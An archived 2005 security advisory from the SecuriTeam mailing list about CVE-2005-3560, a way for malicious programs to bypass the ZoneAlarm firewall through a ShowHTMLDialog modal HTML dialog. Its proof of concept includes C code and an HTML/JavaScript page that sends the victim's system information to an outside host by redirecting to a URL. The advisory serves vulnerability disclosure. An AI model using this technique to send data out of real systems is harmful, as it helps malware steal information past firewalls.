[NT] Zone Labs ShowHTMLDialog Bypassing Vulnerability
- From: SecuriTeam <support@xxxxxxxxxxxxxx>
- Date: 4 Dec 2005 16:40:25 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Zone Labs ShowHTMLDialog Bypassing Vulnerability
------------------------------------------------------------------------
SUMMARY
" <http://www.zonelabs.com/> Zone Alarm Pro and Internet Security Suite
are firewall programs for Microsoft Windows."
By exploiting Zone Lab's trust in certain web based programs, malicious
programs can bypass Zone Alarm Pro and Internet Security Suite protection
and send information about the system to attackers.
DETAILS
Vulnerable Systems:
* Zone Alarm Pro version 6.0.x
* Zone Alarm Internet Security Suit version 6.0.x
* Zone Alarm Firewall with Anti-Spyware version 6.1.x
* Zone Alarm Firewall with Anti-Virus version 6.0.x
* Zone Alarm Firewall (Free Version) version 6.0.x
Zone Alarm products with Advance Program Control or OS Firewall Technology
enabled, detects and blocks almost all those APIs (like Shell,
ShellExecuteEx, SetWindowText, SetDlgItem etc) which are commonly used by
malicious programs to send data via http by piggybacking over other
trusted programs. However, it is still possible for a malicious program
(Trojans or worms etc) to make outbound connections to the evil site by
piggybacking over trusted Internet browser using "HTML Modal Dialog" in
conjunction with simple "JavaScript". Here it is assumed that the default
browser (IE or Firefox etc) has authorization to access internet. In case
of the default installation of ZoneAlarm Pro, IE is by default allowed to
access internet.
By using ShowHTMLDialog() method, it is possible for any malicious program
to create a modal dialog box that displays HTML. This in turn can be used
to redirect the page to the attacker's site. It is observed that using
this method, ZA Pro and Internet Security Suit is unable to block internet
access. This method can be used by any malicious program to send data
outside via http to the attacker and at the same time it can also receive
the command instructions from the attacker.
On successful exploitation the malicious program will be able to send the
victim's details and personal system information to the attacker and this
can further leads to complete system compromise.
Proof of-Concept:
osfwbypass-demo.c:
BOOL LoadHtmlDialog(void)
{
HINSTANCE hinstMSHTML = LoadLibrary(TEXT("MSHTML.DLL"));
if (hinstMSHTML)
{
SHOWHTMLDIALOGFN* pfnShowHTMLDialog;
// Open a Modal Dialog box of HTML content type
pfnShowHTMLDialog = (SHOWHTMLDIALOGFN*)GetProcAddress(hinstMSHTML,
TEXT("ShowHTMLDialog"));
if (pfnShowHTMLDialog)
{
IMoniker *pURLMoniker;
// Invoke the html file containing the data to be sent via http
BSTR bstrURL = SysAllocString(L"c:\\modal-dialog.htm");
CreateURLMoniker(NULL, bstrURL, &pURLMoniker);
if (pURLMoniker)
{
(*pfnShowHTMLDialog)(NULL, pURLMoniker, NULL, NULL, NULL);
pURLMoniker->Release();
}
SysFreeString(bstrURL);
}
FreeLibrary(hinstMSHTML);
}
Return True;
}
/* Eof */
modal-dialog.htm:
< html>
< head>
< meta http-equiv="Content-Language" content="en-us">
< title>Redirection Dialog< / title>
< script language="JavaScript">
< ! - - Here goes the information logged by the malicious program which
will
be sent to the evil site via http request -->
var sTargetURL =
"http://www.hackingspirits.com/vuln-rnd/demo/defeat-osfw.asp?[YourInformation Here] window.location.href = sTargetURL;
window.close;
< / script>
< / head>
< / html>
CVE Information:
<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3560>
CVE-2005-3560
Disclosure Timeline:
10th Oct, 2005 - Bug Originally Discovered
15th Oct, 2005 - Vendor Reported
15th Oct, 2005 - Vendor acknowledged the report
17th Oct, 2005 - Vendor asked for more information
19th Oct, 2005 - Vendor provided with more information and the version
info on which the exploit was tested.
29th Oct, 2005 - Final follow up with the vendor but no response
8th Nov, 2005 - Public Disclosure
ADDITIONAL INFORMATION
The information has been provided by <mailto:debasis@xxxxxxxxxxxxxxxxxx>
Debasis Mohanty.
The original article can be found at:
<http://www.hackingspirits.com/vuln-rnd/vuln-rnd.html>
http://www.hackingspirits.com/vuln-rnd/vuln-rnd.html
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Prev by Date: [NT] MailEnable IMAP Rename Command DoS
- Next by Date: [NEWS] Gecko Engine Multiple Vendor DoS (History.dat)
- Previous by thread: [NT] MailEnable IMAP Rename Command DoS
- Next by thread: [NEWS] Gecko Engine Multiple Vendor DoS (History.dat)
- Index(es):
Relevant Pages
|
